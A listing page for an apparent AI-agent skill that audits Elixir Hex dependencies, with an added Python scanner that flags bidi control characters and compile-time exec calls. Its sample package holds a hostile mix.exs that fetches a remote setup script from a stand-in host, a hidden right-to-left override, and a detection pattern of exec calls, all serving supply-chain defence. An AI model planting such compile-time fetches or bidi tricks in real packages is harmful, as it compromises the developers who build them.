phxdeps-audit

Solid

Audit Hex deps for supply-chain security risk — bidi chars, compile-time exec, maintainer changes, typosquats, CVEs. Use after mix deps.update, when checking if a package upgrade is safe, or reviewing mix.lock PR diffs.

Code & Development 384 stars 25 forks Updated 4 days ago MIT


Quality Score: 95/100

Stars (20%): 86
Recency (20%): 100
Frontmatter (20%): 70
Documentation (15%): 100
Issue Health (10%): 50
License (10%): 100
Description (5%): 100

Skill Content

# Hex Dependency Audit

Non-mutating supply-chain audit for Hex packages. Runs an 8-rule MVP catalogue against changed packages, enriches with Hex API metadata, wraps existing tools (`mix hex.audit`, `mix_audit`, OSV-Scanner), and emits a triage table.

## When to Use

- After `mix deps.update` or `mix deps.get` brought in new versions
- On PRs that touch `mix.lock` (pre-merge gate)
- Before manually updating a single package (`--preview <pkg>`)
- When investigating a dependency you don't recognize

## Iron Laws

1. **NEVER claim a diff is clean without inspecting it.** Run all 8 rules on the unpacked NEW tarball. "Looks fine" without a tool run is a false pass. **Always write `.claude/deps-audit/last-run.json`**: its absence is evidence the audit didn't actually run.
2. **NEVER install `mix_audit` / `osv-scanner`, even if asked.** Detect, warn with install instructions, skip cleanly if missing. If the user says "install it," respond with the install instructions (e.g., adding `mix_audit` to `deps/0` in `mix.exs` with `only: [:dev, :test], runtime: false`) and **do not apply them**. The audit skill is non-mutating; `mix.exs` / `mix.lock` are off-limits regardless of consent.
3. **NEVER promote a finding to BLOCK without rule citation.** Every finding shows `rule_id`, `severity`, `file:line`, `snippet`, `message`. No handwaving.
4. **NEVER fetch from Hex API without rate-limiting.** Cap at 5 req/sec. Cache package metadata for 7 days and the top-500 list for 1 day.
5. **NEVER run the audit on already-committed lock chan...
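To make the "rule citation" requirement concrete, here is an added example (written for this page, not the phxdeps-audit skill's own code) of two of the rule checks the skill describes, bidi control characters and compile-time exec, run over the files of an unpacked package. Every finding carries `rule_id`, `severity`, `file:line`, `snippet` and `message`, and the result can be serialised for `last-run.json`. The rule ids `HEX-001`/`HEX-002`, the severities, the detection patterns and the JSON layout are assumptions; the sample package contents are constructed.

```python
"""Added example (not the phxdeps-audit skill's own code): two rule checks over
an unpacked Hex package, emitting findings in the shape the skill requires.
Rule ids, severities, patterns and the last-run JSON layout are assumptions."""
import json
import re
import unicodedata
from dataclasses import asdict, dataclass
from pathlib import Path

# Unicode bidirectional controls abused in "Trojan Source" style attacks: they
# reorder how a line is displayed without changing how the compiler reads it.
BIDI_CONTROLS = {
    "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",  # LRE, RLE, PDF, LRO, RLO
    "\u2066", "\u2067", "\u2068", "\u2069",            # LRI, RLI, FSI, PDI
}

# Elixir/Erlang calls that execute commands or evaluate code. Inside a build
# file they run on `mix deps.compile`, i.e. on the developer's machine.
EXEC_CALLS = re.compile(
    r"(?<!\w)(System\.cmd|System\.shell|:os\.cmd|Code\.eval_string|"
    r"Code\.eval_file|Port\.open)\b"
)
BUILD_FILES = {"mix.exs", "rebar.config", "Makefile"}  # assumed list

SEVERITY_RANK = {"PASS": 0, "WARN": 1, "BLOCK": 2}


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    location: str  # "file:line"
    snippet: str
    message: str


def _escape(line: str) -> str:
    """Render invisible characters so the snippet is honest in a terminal."""
    return line.strip().encode("unicode_escape").decode("ascii")


def scan_file(relpath: str, text: str) -> list[Finding]:
    """Run both rules over one file of the NEW package version."""
    findings: list[Finding] = []
    in_build_file = Path(relpath).name in BUILD_FILES
    for lineno, line in enumerate(text.splitlines(), start=1):
        loc = f"{relpath}:{lineno}"
        bidi = [c for c in line if c in BIDI_CONTROLS]
        if bidi:
            names = ", ".join(unicodedata.name(c) for c in bidi)
            findings.append(Finding("HEX-001", "BLOCK", loc, _escape(line),
                                    f"bidi control character(s) in source: {names}"))
        m = EXEC_CALLS.search(line)
        if m:
            if in_build_file:
                sev, why = "BLOCK", "in build file, runs on mix deps.compile"
            else:
                sev, why = "WARN", "in library code, review call sites"
            findings.append(Finding("HEX-002", sev, loc, _escape(line),
                                    f"{m.group(1)} call {why}"))
    return findings


def scan_package(files: dict[str, str]) -> list[Finding]:
    """files maps tarball-relative path -> file contents."""
    findings: list[Finding] = []
    for relpath in sorted(files):
        findings.extend(scan_file(relpath, files[relpath]))
    return findings


def verdict(findings: list[Finding]) -> str:
    """Worst severity wins; no findings means PASS."""
    worst = max((SEVERITY_RANK[f.severity] for f in findings), default=0)
    return next(k for k, v in SEVERITY_RANK.items() if v == worst)


def last_run_record(package: str, version: str, findings: list[Finding]) -> str:
    """JSON body for .claude/deps-audit/last-run.json (the layout is assumed)."""
    return json.dumps({"package": package, "version": version,
                       "verdict": verdict(findings),
                       "findings": [asdict(f) for f in findings]}, indent=2)


# Constructed sample package contents; not a real Hex package.
SAMPLE_PACKAGE = {
    "mix.exs": (
        "defmodule Evil.MixProject do\n"
        "  use Mix.Project\n"
        "\n"
        "  def project do\n"
        "    System.cmd(\"curl\", [\"https://example.invalid/setup.sh\"])\n"
        "    [app: :evil, version: \"0.1.0\"]\n"
        "  end\n"
        "end\n"
    ),
    "lib/evil.ex": "defmodule Evil do\n  # checked \u202eelbasid\n  def hello, do: :world\nend\n",
    "lib/clean.ex": "defmodule Clean do\n  def run(cmd), do: System.cmd(cmd, [])\nend\n",
}

if __name__ == "__main__":
    fs = scan_package(SAMPLE_PACKAGE)
    print(f"{'rule':8} {'sev':5} {'location':16} message")
    for f in fs:
        print(f"{f.rule_id:8} {f.severity:5} {f.location:16} {f.message}")
    print("verdict:", verdict(fs))
```

The snippet is escaped on purpose: a bidi override that survives into the triage table unescaped would reorder the table row itself, hiding the very thing the finding reports. The `System.cmd` in `lib/clean.ex` is only a WARN because library code running a command at runtime is an application decision; the same call in `mix.exs` executes during dependency compilation and is a BLOCK.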

Details

Author
oliver-kriska
Repository
oliver-kriska/claude-elixir-phoenix
Created
3 months ago
Last Updated
4 days ago
Language
Python
License
MIT

Similar Skills

Semantically similar based on skill content — not just same category

Code & Development Solid

phxdeps-vet

Record a vetted Hex package version in hex_vet.exs after a security review — manages the audit ledger, not the scanner. Use to approve a dep after /phx:deps-audit findings or to initialize hex_vet.exs.

384 Updated 4 days ago
oliver-kriska
AI & Automation Listed

dependency-audit

Provides dependency management and supply chain security practices for auditing vulnerabilities, checking licenses, assessing dependency health, and managing upgrades safely. Use when auditing packages, reviewing security, managing dependencies, or when user mentions 'audit', 'vulnerability', 'dependency', 'supply chain', 'npm audit', 'license', 'bundle size'.

62 Updated today
Tibsfox
Code & Development Listed

dx-audit

Audit and improve developer experience in a codebase by inspecting README, quickstart, scripts, contributing guide, env docs, error messages, and tooling, scoring onboarding friction, and reporting findings or implementing fixes. Use when a new contributor hits friction, when setup is undocumented, or when the README has not been run on a clean checkout since the stack changed.

0 Updated 6 days ago
HermeticOrmus
AI & Automation Listed

devsecops-supply-chain-audit

Audit software supply chain across every ecosystem (npm, pip, Go, Ruby, Cargo, Maven, Docker, Terraform) — pinning, vulnerabilities, secrets, SBOM, signing, branch protection, CODEOWNERS. One sub-agent per ecosystem. Three modes.

3 Updated today
anthril
AI & Automation Listed

deps

Audit dependency risks and updates.

375 Updated today
boshu2